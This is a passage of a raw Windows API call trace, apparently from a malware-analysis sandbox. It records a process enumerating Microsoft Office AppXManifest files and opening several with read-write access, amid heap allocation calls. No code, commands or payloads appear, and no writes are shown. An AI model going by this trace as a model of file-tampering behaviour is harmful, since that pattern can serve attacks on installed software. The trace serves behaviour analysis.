(HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.484] AreFileApisANSI () returned 1 [0098.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 105 [0098.484] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834f7581, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834f7581, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5e91c)) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0098.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.485] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8351d7a8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8351d7a8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cAlternateFileName="APAD0B~1.XML")) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c848 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0098.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89470 [0098.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0098.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89470 | out: hHeap=0x20000) returned 1 [0098.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.486] AreFileApisANSI () returned 1 [0098.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.486] AreFileApisANSI () returned 1 [0098.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 105 [0098.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.486] GetFileType (hFile=0x35c) returned 0x1 [0098.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.487] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.487] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.487] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.487] CloseHandle (hObject=0x35c) returned 1 [0098.487] AreFileApisANSI () returned 1 [0098.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 105 [0098.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.488] GetFileType (hFile=0x35c) returned 0x1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.488] CloseHandle (hObject=0x35c) returned 1 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.489] AreFileApisANSI () returned 1 [0098.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 105 [0098.489] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8351d7a8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8351d7a8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fd)) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.489] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc3863, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cAlternateFileName="APEDE2~1.XML")) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x892a0 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89728 [0098.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x892a0 | out: hHeap=0x20000) returned 1 [0098.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89728 | out: hHeap=0x20000) returned 1 [0098.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.491] AreFileApisANSI () returned 1 [0098.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0098.491] AreFileApisANSI () returned 1 [0098.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 105 [0098.491] 